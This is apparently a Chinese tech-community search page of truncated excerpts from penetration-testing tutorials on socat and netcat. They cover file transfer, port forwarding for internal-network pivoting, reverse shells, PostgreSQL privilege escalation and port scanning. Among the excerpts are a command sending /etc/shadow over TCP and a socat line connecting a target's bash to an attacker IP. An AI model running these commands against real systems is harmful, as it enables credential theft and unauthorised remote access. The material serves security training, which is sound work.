首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

linux卸载socat,socatLinux下的使用「建议收藏」

目录 0x01 socat介绍 0x02 socat进行文件传输 0x03 socat正向端口转发 0x04 socat反向端口转发 注: 边界机器 Ubuntu 192.168.222.177 内网机器...win7 192.168.222.137 0x01 socat介绍 socat我们在前面也已经介绍过了,之前说的是Windows下的利用,如果没有看到的朋友请移步【socat在Windows下的使用】...,socat本身就是在Linux使用的,非要将它放到Windows下使用难免会有水土不服嘛,这次就回到Linux上来进行socat使用。...apt-get install socat 完成后来检验一下是否安装成功 socat -h 0x02 socat进行文件传输 首先,我们去边界机器执行 socat -u /etc/shadow TCP4...socat.exe tcp-listen:1000 tcp-listen:1001 然后,我们在边缘机器上执行命令 注:10.1.135.96是我本地主机的IP socat tcp4-connect

1.7K20
您找到你想要的搜索结果了吗?
是的
没有找到

socat与Brook 端口转发非权威对比测试,到底孰强孰弱?

Linux安装rinetd实现TCP/UDP端口转发 Docker + Brook + Portainer搭建一套自己的端口转发程序,带WEB管理 使用Nginx进行TCP/UDP端口转发 网上关于端口转发软件的评测非常少...,最高CPU使用率32%,耗时67s,平均耗时1.5347s,错误次数238次 Summary: Total: 67.5975 secs Slowest: 19.9194...context deadline exceeded (Client.Timeout exceeded while awaiting headers) brook压测结果:最高内存占用25Mb,最高CPU使用率...axel多线程下载测试(第三轮) 测试命令 time axel -n 32 "http://137.175.30.xxx:32771/test" 测试文件为200M,使用axel开启32线程进行下载。...如果是个人少量使用,并且机器配置较低的情况下建议socat 如果并发较大,要求更高的效率,建议选择brook 后续将对其它端口转发软件做对比测试,敬请关注。

96810

反弹shell工具(2)

反弹shell SocatLinux 下一个多功能的网络工具,名字来由是”Socket CAT”,因此可以看出它是基于socket的,其功能与netcat类似,不过据说可以看做netcat的加强版,事实上的确也是如此...我这里只简单的介绍下怎么使用它开启监听和反弹shell,其他详细内容可以参见这里:http://brieflyx.me/2015/linux-tools/socat-introduction/ 安装Socat...的方法很简单: Ubuntu等可以直接使用 apt-get install socat 命令进行安装 也可以去官网下载源码包:http://www.dest-unreach.org/socat 攻击机本地监听命令...: socat TCP-LISTEN:2333 - 或 nc -lvvp 2333 目标机主动连接攻击机命令: socat tcp-connect:47.xxx.xxx.72:2333 exec:'bash...OpenSSL反弹加密shell 实验环境:Linux 目标机: 系统:Linux IP:192.168.1.8 攻击机: 系统:Linux IP:47.xxx.xxx.72 假设我们从目标机反弹 shell

69920

第22篇:一次艰难的PostgreSQL不出网提权过程

使用起来也比较简单。如下图所示,这个postgres数据库没有root权限。...Linux提权操作却无gcc 通过postgreSQL提权漏洞,我们可以执行linux系统命令了,接下来需要提权到服务器的root权限。...比较麻烦的是,需要把二进制文件转成16进制格式的,如下图所示: 接下来就是与postgres的提权语句结合起来使用了,原有的echo命令是这样的: echo -e -n "\x23\x23\x23\x23...我想到了一个好久没用的工具socat,解决了这个问题。 socat获取交互型shell socat这款工具,可以说是nc的升级版本,可以轻松获取到一个纯交互环境,github上有很多绿色免安装版本。...socat这款工具可以获取一个纯交互环境,而且在docker精简环境下仍能正常使用。 专注于网络安全技术分享,包括红队、蓝队、日常渗透测试、安全体系建设等 每周一篇,99%原创,敬请关注

1.1K30

渗透测试中几只“猫”的用法

(看上面的帮助信息,-z是用于扫描的,-w用于设置超时时间) UDP扫描: 默认是TCP扫描,在上述命令上增加一个-u 参数即可使用UDP扫描: nc -nv -z -w 1 -u 192.168.56.101...【TIPS:这时KALI变为向win7传送数据了,攻防目标转换,在目标机为Linux时可使用】 (6)其他功能 nc还可以发掘很多其他功能,在LINUX之间可以利用tar传输目录、传输视频流、甚至克隆设备等...(3)文件传输 仍以powercat.ps1为例 接收方win7: ncat.exe -l > powercat.ps1 【TIPS】 -l 监听模式如果不跟端口号,则默认使用31337 发送方KALI...反向shell: KALI监听:socat -dd TCP4-LISTEN:8888 - 【TIPS】由socat -h 得知-d是查看verbosity信息的意思,可以使用1到4个d,越多越详细,建议是使用两个...后进入powercat的下载目录执行Import-Module powercat.ps1,这样后面可以直接使用powercat这个命令。

98210
领券